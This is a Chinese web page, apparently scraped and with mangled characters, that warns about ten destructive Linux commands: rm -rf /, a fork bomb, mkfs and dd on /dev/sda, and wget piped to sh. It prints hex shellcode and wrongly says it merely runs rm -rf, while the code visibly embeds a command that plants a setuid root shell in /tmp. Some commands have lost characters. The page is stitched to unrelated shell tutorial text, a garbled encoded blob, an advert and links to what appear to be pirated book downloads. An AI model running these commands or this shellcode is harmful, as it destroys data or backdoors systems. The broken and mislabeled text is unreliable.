Linux中最危險(xiǎn)的10個(gè)命令
創(chuàng)新互聯(lián)是一家專業(yè)提供霍邱企業(yè)網(wǎng)站建設(shè),專注與成都網(wǎng)站建設(shè)、做網(wǎng)站、HTML5建站、小程序制作等業(yè)務(wù)。10年已為霍邱眾多企業(yè)、政府機(jī)構(gòu)等服務(wù)。創(chuàng)新互聯(lián)專業(yè)網(wǎng)站設(shè)計(jì)公司優(yōu)惠進(jìn)行中。
對(duì)于編程人員或或者Linux系統(tǒng)管理員來說,操作Linux系統(tǒng)最常見的方法就是使用命令行。當(dāng)然,Linux命令行佷有用、很高效,但有時(shí)候也很危險(xiǎn),尤其是在你誤操作或者不確定你自己在正在做什么的時(shí)候。下面我就為大家盤點(diǎn)最危險(xiǎn)是10個(gè)命令,一起來看看吧!
當(dāng)然,以下命令通常都是在root權(quán)限下才能將愚蠢發(fā)揮到無(wú)可救藥;在普 通用戶身份下,破壞的只是自己的一畝三分地。
1. rm -rf 命令
rm -rf命令是刪除文件夾及其內(nèi)容最快的方式之一。僅僅一丁點(diǎn)的敲錯(cuò)或無(wú)知都可能導(dǎo)致不可恢復(fù)的系統(tǒng)崩壞。下列是一些rm 命令的選項(xiàng)。
rm 命令在Linux下通常用來刪除文件。
rm -r 命令遞歸的刪除文件夾,甚至是空的文件夾。(譯注:個(gè)人認(rèn)為此處應(yīng)該是說錯(cuò)了,從常識(shí)看,應(yīng)該是“甚至是非空的文件夾”)
rm -f 命令能不經(jīng)過詢問直接刪除‘只讀文件’。(譯注:Linux下刪除文件并不在乎該文件是否是只讀的,而只是在意其父目錄是否有寫權(quán)限。所以,-f這個(gè)參數(shù) 只是表示不必一個(gè)個(gè)刪除確認(rèn),而是一律悄悄刪除。另外,原始的rm命令其實(shí)也是沒有刪除提示的,只是一般的發(fā)行版都會(huì)將rm通過別名的方式增加-i參數(shù)來 要求刪除確認(rèn),而-f則抑制了這個(gè)提示。)
rm -rf / : 強(qiáng)制刪除根目錄下所有東東。(就是說刪除完畢后,什么也沒有了。。。)
rm -rf *: 強(qiáng)制刪除當(dāng)前目錄的所有文件。
rm -rf . : 強(qiáng)制刪除當(dāng)前文件夾及其子文件夾。
從 現(xiàn)在起,當(dāng)你要執(zhí)行rm -rf命令時(shí)請(qǐng)留心一點(diǎn)。我們可以在“.bashrc”文件對(duì)‘rm‘命令創(chuàng)建rm -i的別名,來預(yù)防用 ‘rm‘命令刪除文件時(shí)的事故,它會(huì)要求你確認(rèn)每一個(gè)刪除請(qǐng)求。(譯注:大多數(shù)發(fā)行版已經(jīng)這樣做了,如果還沒有,請(qǐng)這樣做,并在使用-f參數(shù)前一定考慮好 你在做什么!譯者本人有著血淚的教訓(xùn)啊。)
2. :(){:|:};: 命令
這就是個(gè)fork 炸彈的實(shí)例。具體操作是通過定義一個(gè)名為 ‘:‘的函數(shù),它會(huì)調(diào)用自己兩次,一次在前臺(tái)另一次運(yùn)行在后臺(tái)。它會(huì)反復(fù)的執(zhí)行下去直到系統(tǒng)崩潰。
:(){:|:};:
哦?你確認(rèn)你要試試么?千萬(wàn)別在公司正式的服務(wù)器上實(shí)驗(yàn)啊~~
3. 命令 /dev/sda
上列命令會(huì)將某個(gè)‘命令‘的輸出寫到塊設(shè)備/dev/sda中。該操作會(huì)將在塊設(shè)備中的所有數(shù)據(jù)塊替換為命令寫入的原始數(shù)據(jù),從而導(dǎo)致整個(gè)塊設(shè)備的數(shù)據(jù)丟失。
4. mv 文件夾 /dev/null
這 個(gè)命令會(huì)移動(dòng)某個(gè)‘文件夾‘到/dev/null。在Linux中 /dev/null 或 null 設(shè)備是一個(gè)特殊的文件,所有寫入它的數(shù)據(jù)都會(huì)被清除,然后返回寫操作成功。(譯注:這就是黑洞啊。當(dāng)然,要說明的是,通過將文件夾移動(dòng)到黑洞,并不能阻止 數(shù)據(jù)恢復(fù)軟件的救贖,所以,真正的`徹底毀滅,需要采用專用的軟件或者手法來完成——我知道你肯定有些東西想刪除得干干凈凈的。)
# mv /home/user/* /dev/null
上列命令會(huì)將User目錄所有內(nèi)容移動(dòng)到/dev/null,這意味著所有東西都被‘卷入’黑洞 (null)之中。
5. wget -O- | sh
上列命令會(huì)從一個(gè)(也許是)惡意源下載一個(gè)腳本并執(zhí)行。Wget命令會(huì)下載這個(gè)腳本,而sh會(huì)(無(wú)條件的)執(zhí)行下載下來的腳本。
注意: 你應(yīng)該時(shí)刻注意你下載包或腳本的源。只能使用那些從可信任的源中下載腳本/程序。(譯注:所以,你真的知道你在做什么嗎?當(dāng)遇到這種需要是,我的做法是,先wget下來,然后我去讀一讀其中到底寫了些什么,然后考慮是否執(zhí)行。)
6. mkfs.ext3 /dev/sda
上列命令會(huì)格式化塊設(shè)備‘sda’,你無(wú)疑知道在執(zhí)行上列命令后你的塊設(shè)備(硬盤驅(qū) 動(dòng)器)會(huì)被格式化,嶄新的!沒有任何數(shù)據(jù),直接讓你的系統(tǒng)達(dá)到不可恢復(fù)的階段。(譯注:通常不會(huì)直接使用/dev/sda這樣的設(shè)備,除非是作為raw設(shè) 備使用,一般都需要將sda分成類似sda1、sda2這樣的分區(qū)后才使用。當(dāng)然,無(wú)論你使用sda還是sda1,這樣對(duì)塊設(shè)備或分區(qū)進(jìn)行mkfs都是毀 滅性的,上面的數(shù)據(jù)都會(huì)被蒸發(fā)了。)
7. file
上列命令常用來清空文件內(nèi)容(譯注:通常也用于記錄命令輸出。 不過請(qǐng)?jiān)趫?zhí)行前,確認(rèn)輸出的文件是空的或者還不存在,否則原來的文件可真是恢復(fù)不了了——連數(shù)據(jù)恢復(fù)軟件都未必能幫助你了。另外,我想你可能真正想用的是 “”,即累加新的輸出到文件,而不是刷新那個(gè)文件。)。如果用上列執(zhí)行時(shí)輸入錯(cuò)誤或無(wú)知的輸入類似 “xt.conf” 的命令會(huì)覆蓋配置文件或其他任何的系統(tǒng)配置文件。
8. ^foo^bar
這個(gè)命令在“鮮為人知而又實(shí)用的 Linux 命令大全:”中描述過,用來編輯先前運(yùn)行的命令而無(wú)需重打整個(gè)命令。但當(dāng)用foobar命令時(shí)如果你沒有徹底檢查改變?cè)济畹娘L(fēng)險(xiǎn),這可能導(dǎo)致真正的麻煩。(譯注:事實(shí)上,這種小技巧是譯者認(rèn)為的,少數(shù)史前時(shí)代遺留下來的無(wú)用而有害的“黑客”技巧。)
9. dd if=/dev/random of=/dev/sda
上列命令會(huì)向塊設(shè)備sda寫入隨機(jī)的垃圾文件從而擦出數(shù)據(jù)。當(dāng)然!你的系統(tǒng)可能陷入混亂和不可恢復(fù)的狀態(tài)。(譯注:記得上面說過mv到黑洞并不能徹底刪除數(shù)據(jù)么?那么這個(gè)命令就是給了你一個(gè)徹底刪除的方法!當(dāng)然為了保險(xiǎn)起見,你可以覆寫多次。)
10. 隱藏命令
下面的命令其實(shí)就是上面第一個(gè)命令 (rm -rf)。這里的代碼是隱藏在十六進(jìn)制里的,一個(gè)無(wú)知的用戶可能就會(huì)被愚弄。在終端里運(yùn)行下面命令可能會(huì)擦除你的根分區(qū)。
這個(gè)命令表明通常真正的危險(xiǎn)是隱藏的,不會(huì)被輕易的檢測(cè)到。你必須時(shí)刻留心你在做什么結(jié)果會(huì)怎樣。不要編譯/運(yùn)行從未知來源的代碼。
char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″“\x6e\x2f\x73\x68\x00\x2d\x63\x00″“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;
注意: 不要在你的或你的同學(xué)或?qū)W校的電腦里的Linux終端或Shell執(zhí)行以上的任何一個(gè)命令,因?yàn)檫@將導(dǎo)致數(shù)據(jù)丟失或者系統(tǒng)崩潰。如果你想測(cè)試它們,請(qǐng)?jiān)谔摂M機(jī)上運(yùn)行。
;
linux命令有內(nèi)部命令和外部命令之分。內(nèi)部命令實(shí)際上是shell程序的一部分,其中包含的是一些比較簡(jiǎn)練的linux系統(tǒng)命令,這些命令由shell程序識(shí)別并在shell程序內(nèi)部完成運(yùn)行,通常在linux系統(tǒng)加載運(yùn)行時(shí)shell就被加載并駐留在系統(tǒng)內(nèi)存中。外部命令是linux系統(tǒng)中的實(shí)用程序部分,因?yàn)閷?shí)用程序的功能通常都比較強(qiáng)大,所以它們包含的程序量也會(huì)很大,在系統(tǒng)加載時(shí)并不隨系統(tǒng)一起被加載到內(nèi)存中,而是在需要時(shí)才將其調(diào)進(jìn)內(nèi)存。通常外部命令的實(shí)體并不包含在shell中,但是其命令執(zhí)行過程是由shell 程序控制的。shell程序管理外部命令執(zhí)行的路徑查找、加載存放,并控制命令的執(zhí)行。
《Linux命令行與shell腳本編程大全》百度網(wǎng)盤pdf最新全集下載:
鏈接:
?pwd=33bh 提取碼: 33bh
簡(jiǎn)介:這是一本關(guān)于Linux命令行與shell腳本編程的全方位教程,主要包括四大部分:Linux命令行,shell腳本編程基礎(chǔ),高級(jí)shell腳本編程,如何創(chuàng)建實(shí)用的shell腳本。本書針對(duì)Linux系統(tǒng)的新特性進(jìn)行了全面更新,不僅涵蓋了詳盡的動(dòng)手教程和現(xiàn)實(shí)世界中的實(shí)用信息,還提供了與所學(xué)內(nèi)容相關(guān)的參考信息和背景資料。通過本書的學(xué)習(xí),你將輕松寫出自己的shell腳本。 ?
《Linux典藏大系:Linux Shell命令行及腳本編程實(shí)例詳解》這本書從理論結(jié)合實(shí)踐,全面、系統(tǒng)地介紹了 Linux Shell(Bash)腳本編程的語(yǔ)法、命令、技巧 等內(nèi)容。
下面介紹下目錄內(nèi)容,文末獲取PDF。
Linux操作和Windows有很大不同。要熟練的使用Linux系統(tǒng),首先要了解Linux系統(tǒng)的目錄結(jié)構(gòu),并掌握常用的命令,以便進(jìn)行文件的操作、信息查看和系統(tǒng)參數(shù)配置等。接下來是我為大家收集的Linux的命令行界面,歡迎大家閱讀:
Linux的命令行界面
命令行模式
在Linux中我們很少使用圖形模式,為什么呢?因?yàn)榇笊癫恍?。。。O(∩_∩)O~一般斗門都是用命令行模式來進(jìn)行各種操作,因?yàn)槊钚心J綀?zhí)行速度快,而且穩(wěn)定性高。而Linux中的命令解釋器就是Shell,這也是在使用命令前必須要了解Shell的原因。
為什么要先學(xué)習(xí)Shell
Linux系統(tǒng)主要由四大部分組成:
vcWxvtPv0dSx4LPMu7e+s6Ost72x49PDu6fN6rPJvPK1pbW9uLTU07XEyM7O8bX3tsihow0KPHA+TGludXjG9LavyrGjrNfuz8i9+MjrxNq05rXEysfE2rrLo6yyorOj16TE2rTmo6zIu7rzvfjQ0M+1zbPS/bW8o6zS/bW8tcS5/bPM1tDG9Lavy/nT0L340NC1xLi4vfizzNTauvPMqNTL0NCjrNaxtb3P4LnYtcTPtc2z18rUtLP1yry7r83qsc+686Ostci0/dPDu6e1x8K8oaPTw7untcfCvMqxo6zNqLn9tcfCvL34s8zR6dak08O7p7XEus+3qNDUoaPTw7un0enWpM2ouf2687j5vt3Tw7untcTJ6NbDxvS2r8/gudi1xFNoZWxso6zS1LHjvdPK1dPDu6fK5MjrtcTD/MHusqK3tbvY1rTQ0L3hufuhozwvcD4NCjxwPtPDu6fWtNDQ0ru49sP8we61xLn9s8yjujwvcD4NCjxzdmcgaGVpZ2h0PQ=="256" version="1.1" width="336.28125" xmlns=""Created with Rapha?l 2.1.0用戶用戶命令解釋器Shell命令解釋器Shell 操作系統(tǒng) 操作系統(tǒng)命令結(jié)果
Linux的Shell有很多種,bash(Bourne Again Shell)是使用最廣泛的一種,各個(gè)發(fā)行版一般將其設(shè)置為系統(tǒng)中默認(rèn)的Shell。許多Linux系統(tǒng)將Shell作為重要的系統(tǒng)管理工具,比如:系統(tǒng)的開機(jī)、關(guān)機(jī)及軟件的管理。其他的Shell有:C Shell、Korn Shell、Bourne Shell等,其中C Shell主要因?yàn)槠湔Z(yǔ)法和C語(yǔ)言類似而得名,而Bourne Again Shell是Bourne Shell的擴(kuò)展。
Linux提供的圖形界面接口可以完成絕大多數(shù)的工作,而系統(tǒng)管理員一般更習(xí)慣于使用終端命令行進(jìn)行系統(tǒng)的參數(shù)設(shè)置和任務(wù)管理。使用終端命令行可以方便快速地完成各種任務(wù)。
使用終端命令行需要掌握一些必要的命令,這些命令的組合不僅可以完成簡(jiǎn)單的操作,通過Linux提供的Shell還可以完成一些復(fù)雜的任務(wù)。用戶在終端命令行輸入一串字符,Shell負(fù)責(zé)理解并執(zhí)行這些字符串。然后把結(jié)果顯示在終端上。
注意:大多數(shù)Shell都有命令補(bǔ)齊的功能。
在Unix的發(fā)展歷史上,用戶都是通過Shell來工作的。大部分命令都經(jīng)過了幾十年的發(fā)展和改良,功能強(qiáng)大,性能穩(wěn)定。Linux繼承自Unix,自然也是如此。此外Linux的圖形化界面并不好,并不是所有的命令都有對(duì)應(yīng)的圖形按鈕。在圖形化界面崩潰的情況下,就更要靠Shell輸入命令來恢復(fù)計(jì)算機(jī)了。
命令本身是一個(gè)函數(shù)(function),是一個(gè)小的功能模塊。如果想要讓計(jì)算機(jī)完成很復(fù)雜的事情,則必須通過Shell編程來實(shí)現(xiàn)??梢园衙钭鳛楹瘮?shù),嵌入到Shell程序中,從而讓不同的命令協(xié)同工作。
如何進(jìn)入命令行
如果安裝的是桌面版,有兩種方式進(jìn)入命令行界面:菜單方式、快捷鍵方式。
菜單方式
菜單方式常用的有兩種:
單擊鼠標(biāo)右鍵,選擇【在終端中打開】。
單擊【應(yīng)用程序】-【工具】-【終端】,打開命令行。
虛擬機(jī)上,再多一個(gè)Shift鍵,使用Ctrl+Shift+Alt+F1的形式。在CentOS桌面版中,我測(cè)試這幾個(gè)按鍵都無(wú)效,這里要使用Ctrl+Windows鍵+Alt+F3切換到命令行,在使用Ctrl+Windows鍵+Alt+F1切回圖形界面。
注意:因?yàn)樘摂M機(jī)默認(rèn)與主機(jī)之間的切換快捷鍵是Ctrl+Alt鍵,所以在使用有這兩個(gè)鍵的快捷操作時(shí),盡量不要先按這兩個(gè)鍵,否則就會(huì)跳出虛擬機(jī)模式。
看了“Linux的命令行界面”還想看:
1. LINUX圖形界面下如何快速切換到命令界面
2. 怎么進(jìn)入CMD命令行界面
3. 如何打開命令行窗口的快速編輯功能
4. win7怎么打開DOS命令行窗口
5. 炫酷的Linux終端命令大全
《Linux命令編輯器Shell編程實(shí)例大全》百度網(wǎng)盤pdf最新全集下載:
鏈接:
?pwd=vlzo 提取碼:vlzo
簡(jiǎn)介:全書分上、中、下3篇,共20章,內(nèi)容涵蓋了Linux簡(jiǎn)介、Red Hat Linux 基礎(chǔ)知識(shí)、系統(tǒng)管理與設(shè)置、用戶和用戶組管理、磁盤管理、文件和目錄管理、備份與壓縮、網(wǎng)絡(luò)管理、正則表達(dá)式、vim編輯器、emacs、grep命令、awk與sed、常用的文本編輯命令、Shell編程基礎(chǔ)、Shell變量、條件測(cè)試表達(dá)式、Shell的控制結(jié)構(gòu)、函數(shù)以及Shell編輯實(shí)例。
本書內(nèi)容豐富,語(yǔ)言通俗易懂,敘述深入淺出,適合于各層次Linux用戶。既可以作為各類院校相關(guān)專業(yè)的教材,也可作為L(zhǎng)inux培訓(xùn)的教程及廣大Linux愛好者的專業(yè)參考書。 ?